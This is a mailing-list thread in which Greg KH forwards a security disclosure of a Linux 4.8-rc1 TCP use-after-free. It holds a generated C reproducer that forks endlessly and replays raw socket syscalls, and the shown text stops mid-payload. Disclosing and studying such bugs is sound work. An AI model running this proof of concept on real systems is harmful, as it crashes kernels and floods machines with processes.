* Fw: Linux tcp_xmit_retransmit_queue use after free on 4.8-rc1 / master]
@ 2016-08-16 10:45 Greg KH
  2016-08-16 15:39 ` Eric Dumazet
  0 siblings, 1 reply; 12+ messages in thread
From: Greg KH @ 2016-08-16 10:45 UTC (permalink / raw)
  To: netdev; +Cc: Marco Grassi

For some reason Marco's emails can't make it to netdev, so I'm
forwarding this on.  Please cc: him on responses.

thanks,

greg k-h

----- Forwarded message from Marco Grassi <marco.gra@gmail.com> -----

Date: Mon, 15 Aug 2016 09:20:17 +0800
From: Marco Grassi <marco.gra@gmail.com>
To: oss-security@lists.openwall.com
Cc: cve-assign@mitre.org
Subject: [oss-security] Linux tcp_xmit_retransmit_queue use after free on
	4.8-rc1 / master

Hello, this program causes a use-after-free (a 4-byte read) in
tcp_xmit_retransmit_queue or other tcp_ functions, often in another totally
unrelated process.

A reproducer and KASAN report are provided, tested on master as available at the
time of writing and on 4.8-rc1.

Thank you

Marco (@marcograss) - https://marcograss.github.io/

-------

// to build clang derp4.c -o derp4 -static

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>

// Fallback syscall numbers for when <sys/syscall.h> does not define them.
// The values are the x86-64 ones (the KASAN trace below comes from an
// x86-64 kernel, see entry_SYSCALL_64_fastpath), so the fallbacks are only
// correct when building for that architecture.
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif

// Raw syscall() return values, one slot per generated call.  Only a sparse
// subset of indices is written in main() (0, 1, 3, 4, 7, 9, 10, 12, 47, 51,
// 53, 54, 61); presumably the generator numbered calls it later dropped —
// not stated on the page.  Nothing ever reads these slots, so a failing
// syscall is silently ignored and the sequence simply continues.
long r[62];


// Reproducer for the use-after-free reported above (KASAN report below).
//
// Runs forever: every loop iteration forks a child that replays one fixed
// sequence of raw syscalls — mmap a scratch region, create and bind a
// socket, then sendto / setsockopt / dup / sendmsg / recvfrom / sendto /
// write on it — and the parent reaps the child and starts over.  The
// addresses and constants are left exactly as the generator emitted them;
// the thread's analysis of which part of the sequence matters is in the
// replies.  The crash is observed in an unrelated process (see the report),
// so a silent child is expected here.
//
// NOTE(review): the child branch never exits after its sequence, so a child
// falls out of the if/else, loops back to fork() and becomes a forking
// parent itself; the process count grows until the crash or resource limits.
// NOTE(review): waitpid() and exit() are used without <sys/wait.h> and
// <stdlib.h> — the build relies on implicit declarations.
// argc/argv are unused.
int main(int argc, char **argv)
{
while (1) {
pid_t pid = fork();

if (pid == 0) {
// --- child: replay the generated syscall sequence ---
// Scratch region that every later address (0x2000xxxx) points into.
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
// 128-byte address for bind(); only the first 28 bytes are non-zero.
memcpy((void*)0x20006000,
"\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
128);
r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
// Payload (165 bytes) and 28-byte destination address for the first sendto().
memcpy((void*)0x20012f5a,
"\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1",
165);
memcpy((void*)0x20020000,
"\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0",
28);
// The flags word here is a raw generator value; see the thread for which
// flags are believed to matter.
r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul,
0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
*(uint32_t*)0x20001fff = (uint32_t)0x2;
r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
// r[10] is a second descriptor for the same socket; the remaining calls use it.
r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
*(uint32_t*)0x20018000 = (uint32_t)0x4;
r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul,
0);
// Build the msghdr at 0x2000dfc8 (iov at 0x2000e000, control data at
// 0x2000ed3a) that the sendmsg() below consumes.  Layout is whatever the
// generator produced; the stores are byte-exact and partly unaligned.
*(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
*(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
*(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
*(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
*(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
*(uint64_t*)0x2000dff0 = (uint64_t)0x0;
*(uint32_t*)0x2000dff8 = (uint32_t)0x4;
*(uint16_t*)0x2000e000 = (uint16_t)0x0;
*(uint16_t*)0x2000e002 = (uint16_t)0x0;
*(uint32_t*)0x2000e004 = (uint32_t)0xffff;
*(uint32_t*)0x2000e008 = (uint32_t)0x401;
*(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
*(uint64_t*)0x20000008 = (uint64_t)0x37;
*(uint32_t*)0x2000ed3a = (uint32_t)0x14;
*(uint16_t*)0x2000ed3e = (uint16_t)0x2;
*(uint16_t*)0x2000ed40 = (uint16_t)0x12;
*(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
*(uint32_t*)0x2000ed46 = (uint32_t)0x7;
*(uint8_t*)0x2000ed4a = (uint8_t)0x6;
// 0x100 does not fit in uint8_t; this store writes 0 (generator artefact).
*(uint8_t*)0x2000ed4b = (uint8_t)0x100;
*(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
*(uint32_t*)0x2000ed4d = (uint32_t)0x11;
*(uint16_t*)0x2000ed51 = (uint16_t)0x0;
*(uint16_t*)0x2000ed53 = (uint16_t)0x808;
*(uint32_t*)0x2000ed55 = (uint32_t)0x1;
*(uint32_t*)0x2000ed59 = (uint32_t)0x0;
*(uint8_t*)0x2000ed5d = (uint8_t)0x0;
*(uint32_t*)0x2000ed5e = (uint32_t)0x12;
*(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
*(uint16_t*)0x2000ed64 = (uint16_t)0x200;
*(uint32_t*)0x2000ed66 = (uint32_t)0x5;
// Truncated to 0xffffffff by the uint32_t cast.
*(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
*(uint8_t*)0x2000ed6e = (uint8_t)0x9;
*(uint8_t*)0x2000ed6f = (uint8_t)0x1;
r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
*(uint16_t*)0x20001003 = (uint16_t)0x1;
*(uint8_t*)0x20001005 = (uint8_t)0x0;
*(uint32_t*)0x20001007 = (uint32_t)0x9;
r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul,
0x20000ffbul, 0x8ul);
// 4096-byte random payload for the second sendto().  The literal below
// was line-wrapped by the mail transport (escape sequences are split across
// lines), so this listing does not compile as pasted.
memcpy((void*)0x20015285,
"\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x8
 1\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\
 xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x3
 9\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\
 x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\x33\x4c\x1e\x72\xe9\x00\x1
 a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a\x56\xe1\x59\x92\x1f\x5f\xea\x61\x1b\xe3\x2f\xc0\x15\x9c\x3e\xcf\xe7\x05\xbc\x7e\xe8\x88\x58\x63\x29\xc5\x10\x26\xf0\xbc\xf5\xcd\x3d\x33\xfa\x87\x45\x25\x1d\x86\xc0\xd8\x72\xdc\x1b\xaf\xa1\xf3\x1e\x81\xb4\x7b\x4d\xb5\x79\x72\x87\x92\x1f\x9d\xa1\x8e\x1a\x24\x7f\x49\x11\xc4\x59\xa5\x8e\x6c\x7a\xdd\x17\x52\x47\x3b\x09\x28\xe4\x3b\xef\xb0\xf3\x68\x9c\xd3\x6e\xe9\x89\x38\xdb\xeb\x01\x4f\x39\x9b\x5b\x0c\x8d\x92\xcd\x5c\x15\x47\x15\xa9\x98\x70\x75\xe2\xf0\x5b\xfe\xaa\xa9\xb3\xba\xc9\x8e\x5c\x6d\xfb\x53\xb9\x8b\x4f\x7e\x31\xbe\x69\x7e\x6d\x80\x6f\x3e\xd8\x59\x1c\x13\x5a\x3b\x2b\x0e\xc6\xd1\xf9\xaa\xf1\x30\x16\xf1\x7b\x2f\x6b\x5f\xa9\xde\xfa\xfd\x59\xaa\xdd\x32\xf7\xbb\x94\x28\x93\x16\xb3\x60\xd5\x6c\x62\x93\xba\xa9\xaa\x38\x52\
 xdc\x2f\x37\x75\x1d\x56\xa9\x3c\x7c\x8b\x0d\x56\x9e\x05\xf7\xa1\xa6\xef\x3c\x76\x6e\x06\x06\xde\x07\x84\xa0\xeb\xeb\x8e\x46\x2f\xd9\xc2\x56\xc6\x89\x85\x8c\x39\xad\xa2\x77\x24\xe5\xb5\x00\x04\x4c\xf5\x1e\x4a\x03\x06\xbb\xa1\x1f\xe7\xf8\xb7\x3e\xdd\xfc\x18\xbf\x13\x07\x14\xdd\x8a\x6b\x0f\x44\xc0\xeb\x4a\x43\x7d\x42\xe9\x02\x63\xb5\xc2\x7a\x87\xce\x14\x0c\xaf\xd9\x2b\xaf\x4b\x22\xec\xa9\x3b\x16\xeb\xb7\xc5\x0d\x51\x91\x93\x5d\x90\xe1\x8f\x34\x86\x71\xe0\x7c\xb5\x1e\xe7\x19\xc0\xd6\xc9\x3e\x08\x75\xc0\x1f\xab\x5e\x41\xbf\x0e\x1a\x14\xcc\x40\xf6\x85\x02\xba\x3d\x78\xce\xf7\x6f\x0e\xbf\x51\xda\xc6\xa1\x59\xbd\x69\x1a\x05\x7b\x34\xbd\xa7\x28\x39\xa1\xa2\x18\xa7\x76\x8f\x51\xa5\xd2\xdc\xf4\xa7\x7b\xc8\x64\x0e\xc0\xe8\xac\xc3\xd4\xb9\x11\x78\x58\x79\xe4\x91\xc9\xcf\xe2\x0c\xbb\x11\xb3\x80\x48\xd
 7\xa5\xbd\x45\xdd\xb6\xad\x87\x79\x01\xa0\xe1\x89\xdb\x54\x42\x1c\x78\x47\x91\x07\xe8\xbc\x26\x15\xf2\xdb\xba\x5b\xaa\x5a\x05\x84\xa2\x83\x7d\xe5\xbb\x5a\x77\x3f\x0a\x27\x06\x4e\x86\x69\x95\x27\x22\x7e\xa2\x42\x4d\x61\xa7\xab\x6d\x05\x8b\x7b\x6b\x94\xd6\x10\x40\x66\x30\x0b\x6c\x79\xe1\x62\xee\x33\xed\xd6\xd4\x9a\x3a\xea\x95\x5b\x60\x70\x58\xc9\xc6\x6c\x47\xa7\xd1\xcc\xfa\x9f\xc7\x66\xac\xbb\x4f\xe4\x09\x74\xe3\xd1\xeb\x82\x3b\xce\x4c\x2b\xcf\x08\xcd\xf6\x96\x2b\x65\x2a\x2c\x33\xf5\x7b\x66\xdb\xec\x3d\xbf\x24\xf7\xf9\x87\x99\x26\x1b\x5a\xa0\xd0\x0e\x2f\xc0\x2e\x03\xcd\xf4\x1e\x10\x7c\xb5\xb7\xec\x75\x2c\x20\x89\xc4\xec\x61\x34\x3b\x6c\x68\x14\x95\xd9\x9a\x03\xd7\xf2\x6b\xe6\x50\x14\x80\x72\xa2\x67\xaf\xb3\x19\x12\xcc\xf9\x9d\x3d\x34\x86\x48\xe7\xa6\xe7\xc0\x9b\x6c\xeb\x2c\x0d\x26\x6f\x09\
 xd9\x8c\x92\x8e\xde\x80\x04\x14\xe6\x88\xbb\x39\x2f\x2c\x14\xf2\xda\x86\xdb\x10\x59\x54\x83\xe6\x5e\xe3\x14\x4b\x73\x97\x9a\x94\xa8\x09\x44\x1d\xd0\x62\x2d\x43\xb4\x5e\x38\xaa\x8e\x5b\xdd\x2f\xd3\x2c\x8e\xd3\xd0\x0f\x9d\x80\xca\x87\x4e\xab\x52\x01\x29\xb7\xe7\x55\xa2\xe4\x2d\xee\xce\x30\xe9\xcb\xc4\x3e\xf9\x58\x04\x63\x01\xec\x89\x33\x01\x26\x7d\xe2\x5d\x41\xf7\x91\xa3\xcb\x41\x62\xb4\x82\x6d\xb9\xd1\xad\xf2\x96\x0f\xad\x87\xbe\x6d\x95\xaf\xc2\x14\x12\x78\x10\x90\x86\x61\x55\x97\x77\x5c\x19\xfe\x4e\xda\xf3\x74\x08\x83\x4d\xa0\x25\x04\x05\x4b\xf3\x30\xc1\x2f\xb6\x16\x2d\x9b\x2c\x7d\x90\x5a\xd2\x28\x53\xc5\x3a\x14\x8c\x1f\xda\xd7\x36\x47\xdc\x85\x7f\x2b\xe8\x0d\xf9\x03\x92\xba\x82\x20\xde\xb3\x65\x14\xe8\xdd\xfe\x6b\x3a\xab\xd5\xad\x03\xcb\x4f\x41\x08\x97\x22\xe7\xc7\x1d\x0e\x7c\x8e\x4d\x1
 2\x2c\x86\x8b\xb3\x31\x43\x5f\x6e\x37\xcf\x08\x83\x4d\x16\xd7\x3f\x4a\x80\x2b\x67\x1a\xbb\xaf\x8d\x1c\x1c\x5d\x00\x33\xf3\x67\x13\x43\xf1\x09\x00\x81\x68\xe1\x33\xb1\xb4\xc1\xad\xd9\x99\x0c\xac\x4f\x09\x26\xd7\xff\xc8\xcd\xfd\xe9\x32\x52\xd1\x4c\xee\x61\x89\xe0\x82\x64\xa3\x6b\xeb\x23\x87\xc8\xed\x94\xa6\x6b\x68\xec\x13\x59\xa7\x74\x06\x7d\xac\x6f\xfd\xf5\x3d\x3b\x9d\x8b\xe1\x22\x98\xf3\x0e\xbd\x3f\xfa\xbe\xb9\x86\x3d\xe4\x1f\x30\xd4\x96\x6f\x7f\xd4\x48\xbc\xc9\x8b\x1e\x8f\x63\xa1\xb4\xa9\x43\xf2\xb8\x28\x5e\x57\x93\xc5\x56\x21\x12\x20\xd5\x16\x29\x14\xb0\xff\x42\xba\x0e\x26\x6e\xcd\x7e\x7c\x72\x27\xfb\xd2\x0f\xac\xdb\x0d\xc8\xc8\xd6\xa0\xc7\x5b\xfd\x0c\xd7\x89\xe8\x8b\xee\x24\x0f\xd1\x78\x23\x82\xe7\xb5\x7f\x63\xb3\x14\x10\x78\x26\x23\xd3\x60\xbd\x53\x5a\x1b\x67\x0f\xcf\xd5\xfe\x90\x18\
 xa9\xd6\x80\xc3\x94\x00\x21\x6d\xdb\xab\x09\x38\x0d\x77\xdc\x3e\x90\x2f\x3c\x0e\x06\x6b\xaf\x14\x45\xcc\x0d\xcb\x1b\x74\xdc\x01\xec\x29\x23\x96\xe0\x2a\x86\xee\x92\x9c\x86\x10\x9f\x3d\x7a\x56\xf3\x6f\x3b\xef\x2b\x84\xd5\xcf\xd3\xf7\x2b\xa6\x0d\x9c\xa2\xb0\x42\x8f\xed\x53\x99\x7a\x11\x64\x5e\x53\x92\xb7\x97\x20\xaa\x25\xc2\x5d\x6b\xbd\xde\x58\xe7\x51\xc2\xd5\xa5\xe0\x9b\xbf\xe4\x81\x1c\xd5\xc4\xee\x29\xfa\xd2\xbb\xce\xbf\xfe\x40\xee\x09\xf5\x4b\xb2\x1e\x33\xef\x8f\xf9\x05\x68\x15\x7a\x45\xa0\x52\x3c\x29\xf4\x01\xf2\x64\x98\x2d\xbd\x89\xae\x86\x80\xd9\x0a\xfe\xca\x86\x46\xc3\x58\xd6\x1d\x54\xd4\x6f\x36\xe0\x32\x6a\x23\x29\xbd\x69\x22\x9b\x1e\x7f\x01\x28\xff\xc0\x1c\x8f\x01\x08\xa4\x96\xda\xfe\x96\xab\xf2\x23\x34\x34\xb0\x46\x38\xd6\x2f\x87\x62\xcf\x96\x85\xbb\xcc\x98\x27\xfc\x91\xea\xd9\x7
 8\xc4\xcb\x42\xc0\xd3\x7d\x90\x1c\xfa\x62\xa8\xb7\xf3\x31\x04\x56\xa1\x97\xe1\xa8\xfc\xab\x90\x64\x01\x81\xae\x20\x05\x2f\x91\xaf\x27\xb9\xb5\x12\xce\x94\xa6\x6b\x32\xf2\xd0\x0b\xf5\x71\xff\xbb\xd8\xe1\x20\x5f\x0d\xbe\x90\x44\xe4\xa5\xb5\xf6\xa3\x70\x5b\xd3\x24\xa2\xb6\xba\x22\xd7\x27\x47\xff\xff\x79\x65\xf1\x82\xcf\x51\x56\xa6\x6f\x48\x32\x66\x7b\x3f\x3f\x7c\xb8\x6f\x0f\x2d\xe8\x92\x72\x86\xc4\x9e\x6f\xe7\xb6\x3f\xb6\x6f\x96\xdc\x68\x8d\x1d\x1c\xfe\x3f\x23\x45\x7d\x35\xed\x3d\x6a\x06\xe8\x4b\x7f\xb1\xe6\x2b\x66\x4a\x53\x45\xa4\x5c\x77\x96\x25\x4a\x13\x3a\xf3\xbe\x7e\x16\xb0\x51\x84\x53\xe6\x4e\x37\xd7\xc1\xee\xda\xfb\x18\xb0\x81\x3b\x16\xfc\xea\x32\x00\x75\x97\x1a\xc9\xf9\x5a\x44\x1a\x12\x08\xcb\xbe\x60\x79\x80\x60\xcd\xbd\x5b\x60\x9b\xfc\x31\x5b\xca\xa5\xda\x16\x18\x45\x95\xe1\x5b\xd4\
 x4c\xdc\xc9\x10\x73\x14\xbb\x0b\x9c\xdb\x0c\x0c\x8c\x3b\x42\x29\xf4\x7d\x93\x61\x5a\x6a\x6b\xac\xae\x80\x60\x5d\xd1\x3e\xe4\x6d\xf7\x3f\xb8\x7b\x7f\x35\x1b\x67\xd3\x60\x80\x0a\x08\x25\xff\xbb\x31\x47\x60\xb3\xd1\x0e\xce\xbc\xf3\x88\xe0\x56\x5e\x61\x97\x63\x82\xa4\xff\xea\xf9\x48\x7f\x4c\x62\x58\x46\x30\xe5\x2c\xbe\xa0\x18\xe4\xe8\xf6\x4f\x22\x5b\x1d\x18\xb0\x48\x0c\xe7\x25\xa9\x1a\x8e\x5a\x3f\xbd\x4c\xab\xe7\x52\x29\xa2\x35\x77\xf5\x0c\x8c\x4e\x2d\xa9\x16\x11\x00\xdf\x8b\xe1\x7f\x8f\x20\x9d\xe9\xea\x2b\x4e\xf4\xe5\x98\x4e\xf8\xe9\x5b\x98\xb9\x2a\xb8\x68\x0d\xdb\x35\xf8\xfd\x5d\x28\x14\x2a\x65\x33\x3d\xde\x77\xc5\x73\xee\xc4\xa4\x8e\x76\x12\x4f\x28\x93\x7d\xd8\xf5\xbf\x32\x39\xe1\xc1\xaa\x46\x71\x9f\xcb\xa4\x93\xa5\xae\xe0\xb1\x9f\x03\xb3\xbe\x86\xf9\x92\x45\x65\x64\x8d\xd9\x49\x09\xd2\x0
 c\x01\x92\x75\x1a\x29\x43\x34\x74\x21\x6d\xa6\x0e\xa7\x3b\x15\x2c\x59\xc2\xb9\x8a\x92\xcb\xc3\x8c\xc7\x06\xfd\xfc\xe1\x67\xc7\xc5\xc6\x07\x24\xc8\x06\xa7\xdc\x76\x83\x43\xec\x90\x3b\x6f\xa0\x00\x9a\x68\x44\x71\x19\xbe\xdb\x24\xb0\xcb\x9b\x8a\x28\xb6\x30\x99\x79\xd2\x42\xbe\x53\x32\x84\x0c\x17\xdc\xc9\x1c\xa9\xed\x26\x20\x69\xef\x6d\xc4\xa4\xad\xe5\x68\xec\x52\xe8\x51\x3f\xb2\x52\xbc\x6f\x84\x26\x41\xf9\x91\x22\x66\x89\xcc\x03\xa6\xa5\x7a\x07\xd7\x35\x92\x5e\xc1\xf9\x11\x1b\x4b\x6d\x50\x7b\x4f\x43\xca\x13\x37\xd2\x6d\xce\x81\xa8\x9b\x8b\x8c\x65\x75\x08\x97\x18\xb6\xd2\x2e\xd2\xe3\x31\x51\x2e\xb0\xb3\x04\x64\x71\xba\x05\x4b\x23\x91\x92\xfd\x4a\x1b\x6c\x35\xa5\x8f\xcb\xb5\xac\xd9\x40\xe5\x4b\x6b\x04\xe2\x2a\xab\xd9\x0d\xcf\x0b\x23\xfa\x1f\xcd\x4a\x46\xb0\x26\xc4\xb8\xae\x17\x82\x6c\x7f\x6f\
